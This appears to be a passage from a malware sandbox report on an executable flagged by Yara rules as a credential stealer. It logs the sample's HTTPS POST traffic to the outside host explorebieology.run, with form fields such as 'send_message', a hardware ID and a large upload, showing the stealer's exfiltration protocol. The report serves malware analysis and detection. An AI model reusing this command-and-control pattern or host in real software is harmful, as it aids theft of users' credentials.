                                                                            Data Ascii: 3386CIGNaPzpqSCngLg5zPwlpKvmZM3LELBpN+Mn+CELcWvs1JkMaO1pYVMFvGpM/MZ0OrIUGYpEETkD1nO4wdsR6mwUyZgcSEmwpiAoeXyc5VTb1rX9+wDRmbejB+z1TyGLSIGNanzZ2dVipDmdLdglJM8Dke1rcEHpF+MHidG7QNrMVKhIzLk5wAfQCAms/OR0mwYlWW80EThD1nO6wNpBWrxFadh8OAnB0wTcaNw9MVGKZxSdGiTw3cejM
                                                                            2025-03-05 08:14:10 UTC1369INData Raw: 69 2b 76 77 30 79 57 69 39 58 57 6a 6b 4e 70 51 34 47 51 68 4a 6f 56 53 4c 74 71 57 4e 32 2b 41 68 71 58 64 7a 42 30 68 52 79 30 46 36 6e 49 54 4a 61 44 78 70 4b 56 41 33 63 4e 69 35 33 57 77 56 77 41 2f 69 46 5a 7a 76 31 5a 56 4c 78 32 4b 58 36 49 44 50 41 71 72 38 5a 4f 6b 5a 43 41 69 61 35 44 4d 41 79 63 33 4a 7a 37 54 41 43 33 62 52 36 4f 2f 52 51 54 6e 48 6f 6c 62 59 67 57 6f 78 53 68 78 47 4b 5a 67 64 61 56 6e 67 35 68 43 73 71 58 79 59 49 62 41 4c 64 35 48 6f 37 39 4c 68 4f 4b 66 68 42 34 6e 68 50 79 55 65 7a 50 56 74 62 65 67 4b 6a 52 48 33 4d 54 68 5a 50 56 2f 42 55 59 71 56 38 65 33 61 73 47 42 4a 39 72 4e 48 61 44 43 34 78 66 39 4a 77 53 78 4e 53 53 78 49 35 4e 62 7a 7a 49 33 4d 57 43 44 58 6d 70 49 55 69 57 35 56 4e 61 33 47 39 2f 49 38 39 64
                                                                            Data Ascii: i+vw0yWi9XWjkNpQ4GQhJoVSLtqWN2+AhqXdzB0hRy0F6nITJaDxpKVA3cNi53WwVwA/iFZzv1ZVLx2KX6IDPAqr8ZOkZCAia5DMAyc3Jz7TAC3bR6O/RQTnHolbYgWoxShxGKZgdaVng5hCsqXyYIbALd5Ho79LhOKfhB4nhPyUezPVtbegKjRH3MThZPV/BUYqV8e3asGBJ9rNHaDC4xf9JwSxNSSxI5NbzzI3MWCDXmpIUiW5VNa3G9/I89d
                                                                            2025-03-05 08:14:10 UTC1369INData Raw: 74 53 68 4d 6e 52 67 4a 77 64 64 30 2b 4f 6a 63 6e 4f 46 51 37 77 4c 56 72 64 73 51 51 54 6a 44 49 74 61 34 51 57 70 46 4f 6f 32 67 44 59 78 74 47 64 6e 68 39 2b 42 4d 6d 4e 30 73 39 46 51 37 56 6d 45 74 36 73 44 42 6a 63 4d 33 39 75 68 42 61 30 45 72 6d 48 55 59 43 46 31 70 48 64 42 57 45 4f 69 74 7a 37 6a 42 56 59 38 44 6b 65 34 37 34 50 47 70 74 72 4c 6a 61 76 45 62 34 63 6f 4d 6c 48 31 73 69 41 6b 4e 46 56 49 30 33 47 6d 4e 57 43 44 52 44 69 4f 67 75 46 36 6c 46 47 67 7a 4d 6d 4f 35 6c 61 36 6b 33 69 69 46 4c 57 33 6f 44 52 6b 68 39 69 42 59 57 4b 78 34 56 72 66 72 46 73 55 5a 71 7a 43 68 53 62 62 53 6c 67 77 78 4b 78 42 62 62 32 66 72 32 4b 78 70 47 4c 43 6e 59 6c 70 74 79 4b 67 6c 6f 41 36 46 67 65 6e 76 30 2b 57 74 78 6c 66 79 50 50 4c 37 45 52 6f
                                                                            Data Ascii: tShMnRgJwdd0+OjcnOFQ7wLVrdsQQTjDIta4QWpFOo2gDYxtGdnh9+BMmN0s9FQ7VmEt6sDBjcM39uhBa0ErmHUYCF1pHdBWEOitz7jBVY8Dke474PGptrLjavEb4coMlH1siAkNFVI03GmNWCDRDiOguF6lFGgzMmO5la6k3iiFLW3oDRkh9iBYWKx4VrfrFsUZqzChSbbSlgwxKxBbb2fr2KxpGLCnYlptyKgloA6Fgenv0+WtxlfyPPL7ERo
                                                                            2025-03-05 08:14:10 UTC1369INData Raw: 6a 7a 5a 75 55 41 33 64 42 70 35 62 55 7a 31 70 48 38 43 38 65 32 76 31 5a 56 4a 31 33 4c 33 61 41 48 66 34 59 74 73 38 41 32 4d 62 4f 31 73 6c 4e 63 51 6d 57 6b 63 76 46 47 55 61 2b 62 78 37 4a 38 78 68 55 69 6a 31 6e 4b 4d 46 61 6f 46 2f 30 69 41 65 59 69 38 47 56 6e 77 35 69 45 59 43 66 30 73 45 53 66 6f 35 45 55 39 75 34 44 78 4f 69 51 78 35 78 6e 78 65 39 47 4f 37 6f 52 34 43 46 2f 71 69 6d 48 48 63 54 78 4c 72 48 31 46 59 41 2f 69 46 47 6c 75 56 42 4e 5a 5a 74 4d 6e 53 49 57 4a 49 59 75 73 73 41 32 4d 62 45 31 73 6c 4e 56 51 36 4c 6d 63 72 46 46 32 47 36 63 56 50 5a 75 6b 4d 30 6d 32 73 38 4f 38 46 61 76 6c 2f 30 69 45 47 63 6c 73 32 5a 6c 6b 46 33 47 59 48 63 69 6f 4a 62 41 4f 67 68 58 39 79 74 44 42 75 62 4d 54 6c 31 67 56 71 74 55 62 57 49 56 74
                                                                            Data Ascii: jzZuUA3dBp5bUz1pH8C8e2v1ZVJ13L3aAHf4Yts8A2MbO1slNcQmWkcvFGUa+bx7J8xhUij1nKMFaoF/0iAeYi8GVnw5iEYCf0sESfo5EU9u4DxOiQx5xnxe9GO7oR4CF/qimHHcTxLrH1FYA/iFGluVBNZZtMnSIWJIYussA2MbE1slNVQ6LmcrFF2G6cVPZukM0m2s8O8Favl/0iEGcls2ZlkF3GYHcioJbAOghX9ytDBubMTl1gVqtUbWIVt


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
2          | 192.168.2.4 | 49735       | 104.21.31.208  | 443              | 7280 | C:\Users\user\Desktop\JqGBbm7.exe

Timestamp: 2025-03-05 08:14:11 UTC | Bytes transferred: 371 | Direction: OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=XP2FTWXZX62T3ES
Cookie: __cf_mw_byp=jbHAwUcAdytIGQtFfN58sTgYZjo1qwz1caz7LgJSFBs-1741162449-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18154
Host: explorebieology.run

Timestamp: 2025-03-05 08:14:11 UTC | Bytes transferred: 15331 | Direction: OUT
Data (ASCII, start of the multipart body; the capture is truncated):
--XP2FTWXZX62T3ES
Content-Disposition: form-data; name="act"

send_message
--XP2FTWXZX62T3ES
Content-Disposition: form-data; name="lid"

1vJIvk--mix-labs-20k
--XP2FTWXZX62T3ES
Content-Disposition: form-data; name="pid"

2
--XP2FTWXZX62T3ES
Co

Timestamp: 2025-03-05 08:14:11 UTC | Bytes transferred: 2823 | Direction: OUT
Data: non-printable binary payload (hex dump not reproduced)

Timestamp: 2025-03-05 08:14:12 UTC | Bytes transferred: 820 | Direction: IN
HTTP/1.1 200 OK
Date: Wed, 05 Mar 2025 08:14:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sWCjMDHAncGMFIa8J%2FEvaN78rWJZngE%2FQ1xbkZtG%2Bd%2BGV%2Ban37S0prJopSajd4Rb5CZErJ7spGKIJnv3IOYDwzIb0ynq31q4qqb8PiwRuduN9ixolsUWTAFq06C4GlCJmYMQLQWh"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91b828899d4c42f1-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1624&rtt_var=626&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2848&recv_bytes=19205&delivery_rate=1722713&cwnd=184&unsent_bytes=0&cid=47ed3926601f6dc3&ts=857&x=0"

Timestamp: 2025-03-05 08:14:12 UTC | Bytes transferred: 20 | Direction: IN
Data (ASCII, chunked body): f\r\nok 8.46.123.189\r\n

Timestamp: 2025-03-05 08:14:12 UTC | Bytes transferred: 5 | Direction: IN
Data (ASCII, terminating chunk): 0\r\n\r\n


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
3          | 192.168.2.4 | 49736       | 104.21.31.208  | 443              | 7280 | C:\Users\user\Desktop\JqGBbm7.exe

Timestamp: 2025-03-05 08:14:13 UTC | Bytes transferred: 370 | Direction: OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SD83XGQ5HVYPN1T
Cookie: __cf_mw_byp=jbHAwUcAdytIGQtFfN58sTgYZjo1qwz1caz7LgJSFBs-1741162449-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8775
Host: explorebieology.run

Timestamp: 2025-03-05 08:14:13 UTC | Bytes transferred: 8775 | Direction: OUT
Data (ASCII, start of the multipart body; the capture is truncated):
--SD83XGQ5HVYPN1T
Content-Disposition: form-data; name="act"

send_message
--SD83XGQ5HVYPN1T
Content-Disposition: form-data; name="lid"

1vJIvk--mix-labs-20k
--SD83XGQ5HVYPN1T
Content-Disposition: form-data; name="pid"

2
--SD83XGQ5HVYPN1T
Co

Timestamp: 2025-03-05 08:14:13 UTC | Bytes transferred: 812 | Direction: IN
HTTP/1.1 200 OK
Date: Wed, 05 Mar 2025 08:14:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nPhjFOvTklF0dAmnxtwci37%2BXe7EZAScP2a5F6w9Q3C7xiwkp4I27tNP53mkbWDcnBgfb9GbtC6%2BUg2AIDbYC7QC4r8FuBiPvURhPMIFOeOyao2h9QLpHbRjGsa8ESv65v6vukaW"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91b82893adb1c33f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1601&rtt_var=608&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2849&recv_bytes=9803&delivery_rate=1788120&cwnd=192&unsent_bytes=0&cid=93866c4b7a79e1ac&ts=659&x=0"

Timestamp: 2025-03-05 08:14:13 UTC | Bytes transferred: 20 | Direction: IN
Data (ASCII, chunked body): f\r\nok 8.46.123.189\r\n

Timestamp: 2025-03-05 08:14:13 UTC | Bytes transferred: 5 | Direction: IN
Data (ASCII, terminating chunk): 0\r\n\r\n


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
4          | 192.168.2.4 | 49737       | 104.21.31.208  | 443              | 7280 | C:\Users\user\Desktop\JqGBbm7.exe

Timestamp: 2025-03-05 08:14:14 UTC | Bytes transferred: 368 | Direction: OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=ASPGXNLNWEAE
Cookie: __cf_mw_byp=jbHAwUcAdytIGQtFfN58sTgYZjo1qwz1caz7LgJSFBs-1741162449-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20410
Host: explorebieology.run

Timestamp: 2025-03-05 08:14:14 UTC | Bytes transferred: 15331 | Direction: OUT
Data (ASCII, start of the multipart body; the capture is truncated):
--ASPGXNLNWEAE
Content-Disposition: form-data; name="act"

send_message
--ASPGXNLNWEAE
Content-Disposition: form-data; name="lid"

1vJIvk--mix-labs-20k
--ASPGXNLNWEAE
Content-Disposition: form-data; name="pid"

3
--ASPGXNLNWEAE
Content-Dispos

Timestamp: 2025-03-05 08:14:14 UTC | Bytes transferred: 5079 | Direction: OUT
Data: non-printable binary payload, mostly zero bytes (hex dump not reproduced)

Timestamp: 2025-03-05 08:14:15 UTC | Bytes transferred: 817 | Direction: IN
HTTP/1.1 200 OK
Date: Wed, 05 Mar 2025 08:14:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gP8OTJiaoBOXbtRGx0DTMA4LQIY35lVUd%2FVbMWPJ1oZuSYiAaa%2FtejhIvbzbXD3dWfblpKpFTTpND7wng%2FWtc1bGSzykWcVDmiBqdMFtGZUE41sJgI%2FmW0zVy5oc3m4NZDBHA00m"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91b8289c5b824693-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1655&rtt_var=624&sent=13&recv=26&lost=0&retrans=0&sent_bytes=2850&recv_bytes=21458&delivery_rate=1749550&cwnd=58&unsent_bytes=0&cid=b8fc119dbb9adad3&ts=709&x=0"

Timestamp: 2025-03-05 08:14:15 UTC | Bytes transferred: 20 | Direction: IN
Data (ASCII, chunked body): f\r\nok 8.46.123.189\r\n

Timestamp: 2025-03-05 08:14:15 UTC | Bytes transferred: 5 | Direction: IN
Data (ASCII, terminating chunk): 0\r\n\r\n


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
5          | 192.168.2.4 | 49738       | 104.21.31.208  | 443              | 7280 | C:\Users\user\Desktop\JqGBbm7.exe

Timestamp: 2025-03-05 08:14:16 UTC | Bytes transferred: 373 | Direction: OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=6Q3E6TYJE8RBGJQCSH
Cookie: __cf_mw_byp=jbHAwUcAdytIGQtFfN58sTgYZjo1qwz1caz7LgJSFBs-1741162449-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 2515
Host: explorebieology.run

Timestamp: 2025-03-05 08:14:16 UTC | Bytes transferred: 2515 | Direction: OUT
Data (ASCII, start of the multipart body; the capture is truncated):
--6Q3E6TYJE8RBGJQCSH
Content-Disposition: form-data; name="act"

send_message
--6Q3E6TYJE8RBGJQCSH
Content-Disposition: form-data; name="lid"

1vJIvk--mix-labs-20k
--6Q3E6TYJE8RBGJQCSH
Content-Disposition: form-data; name="pid"

1
--6Q3E6TYJE8

Timestamp: 2025-03-05 08:14:16 UTC | Bytes transferred: 815 | Direction: IN
HTTP/1.1 200 OK
Date: Wed, 05 Mar 2025 08:14:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=82re%2F6FQmEJPr8ZfnfQa0nAM2qLaUiZJl3StM%2F1G3BWuW2V1RFMaWQ5bQcjwjtATLoXJqxMTjpCzi6wSCc9FeTQgv%2BjggLttAc26WrtS9vQswFh3mY%2BURMHRW1jT1T1JGuYitaZX"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91b828a79ae6847d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2054&min_rtt=2034&rtt_var=777&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2850&recv_bytes=3524&delivery_rate=1435594&cwnd=120&unsent_bytes=0&cid=08811038abcbbafa&ts=527&x=0"

Timestamp: 2025-03-05 08:14:16 UTC | Bytes transferred: 20 | Direction: IN
Data (ASCII, chunked body): f\r\nok 8.46.123.189\r\n

Timestamp: 2025-03-05 08:14:16 UTC | Bytes transferred: 5 | Direction: IN
Data (ASCII, terminating chunk): 0\r\n\r\n


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.449739104.21.31.2084437280C:\Users\user\Desktop\JqGBbm7.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-03-05 08:14:17 UTC370OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=2KZFCL2DX9GXP
                                                                            Cookie: __cf_mw_byp=jbHAwUcAdytIGQtFfN58sTgYZjo1qwz1caz7LgJSFBs-1741162449-0.0.1.1-/api
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 584934
                                                                            Host: explorebieology.run
                                                                            2025-03-05 08:14:17 UTC15331OUTData Raw: 2d 2d 32 4b 5a 46 43 4c 32 44 58 39 47 58 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 32 4b 5a 46 43 4c 32 44 58 39 47 58 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 31 76 4a 49 76 6b 2d 2d 6d 69 78 2d 6c 61 62 73 2d 32 30 6b 0d 0a 2d 2d 32 4b 5a 46 43 4c 32 44 58 39 47 58 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 4b 5a 46 43 4c 32 44 58 39 47 58 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                            Data Ascii: --2KZFCL2DX9GXPContent-Disposition: form-data; name="act"send_message--2KZFCL2DX9GXPContent-Disposition: form-data; name="lid"1vJIvk--mix-labs-20k--2KZFCL2DX9GXPContent-Disposition: form-data; name="pid"1--2KZFCL2DX9GXPContent-Di
                                                                            2025-03-05 08:14:19 UTC | 822 | IN | HTTP/1.1 200 OK
                                                                            Date: Wed, 05 Mar 2025 08:14:19 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3PtYmYyrIEvpQx1Gj1tOzxB1w1dOxD3GKPjRi2gdeM870V4%2BbYYzruhfkStw20Y6PGag8d%2F1V4%2BGWrCMPJ1s6pVDJkoN%2BA3yMAOf8OzeigTcEo3YoFIX5FitplMx8Qc6lL1rD6Sa"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 91b828b12ebe424c-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1561&rtt_var=594&sent=203&recv=603&lost=0&retrans=0&sent_bytes=2849&recv_bytes=587612&delivery_rate=1830721&cwnd=203&unsent_bytes=0&cid=ec8610721d1aaa58&ts=1614&x=0"


                                                                            Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                            7          | 192.168.2.4 | 49740       | 104.21.31.208  | 443              | 7280 | C:\Users\user\Desktop\JqGBbm7.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2025-03-05 08:14:19 UTC | 356 | OUT | POST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cookie: __cf_mw_byp=jbHAwUcAdytIGQtFfN58sTgYZjo1qwz1caz7LgJSFBs-1741162449-0.0.1.1-/api
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 89
                                                                            Host: explorebieology.run
                                                                            2025-03-05 08:14:19 UTC | 89 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 31 76 4a 49 76 6b 2d 2d 6d 69 78 2d 6c 61 62 73 2d 32 30 6b 26 6a 3d 26 68 77 69 64 3d 41 45 32 35 37 33 44 33 32 38 32 38 39 41 32 44 46 32 42 31 30 35 30 39 41 46 30 44 46 46 41 41
                                                                            Data Ascii: act=get_message&ver=4.0&lid=1vJIvk--mix-labs-20k&j=&hwid=AE2573D328289A2DF2B10509AF0DFFAA
                                                                            2025-03-05 08:14:20 UTC | 814 | IN | HTTP/1.1 200 OK
                                                                            Date: Wed, 05 Mar 2025 08:14:20 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hvP47wG639unLNN19HVS4BvCffDT4UwM4BLcv5lbtTYXOWmM%2BHu%2B1yWl4HDq1MD6nDQ5b3mn8bFRWeGgbxv2R0AZzUVqXKnDqv%2F4bzaiLgRZ9%2BZ2Z8tnpNcuevwWic5u2hiC34Au"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 91b828be8c847b0b-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2025&min_rtt=2023&rtt_var=760&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1081&delivery_rate=1443400&cwnd=67&unsent_bytes=0&cid=46b57c8bd4798dae&ts=445&x=0"
                                                                            2025-03-05 08:14:20 UTC | 54 | IN | Data Raw: 33 30 0d 0a 43 58 6a 78 32 4e 43 6e 56 2f 6d 59 71 4b 55 67 2b 58 77 35 63 55 4b 41 47 47 69 61 51 4f 4f 76 73 30 45 77 61 49 54 49 4b 71 46 53 4a 51 3d 3d 0d 0a
                                                                            Data Ascii: 30CXjx2NCnV/mYqKUg+Xw5cUKAGGiaQOOvs0EwaITIKqFSJQ==
                                                                            2025-03-05 08:14:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0



                                                                            Target ID:0
                                                                            Start time:03:14:06
                                                                            Start date:05/03/2025
                                                                            Path:C:\Users\user\Desktop\JqGBbm7.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\JqGBbm7.exe"
                                                                            Imagebase:0x9c0000
                                                                            File size:2'996'224 bytes
                                                                            MD5 hash:30C1A6337089E68B975438CAEBC8F497
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1759629623.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1770818531.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:true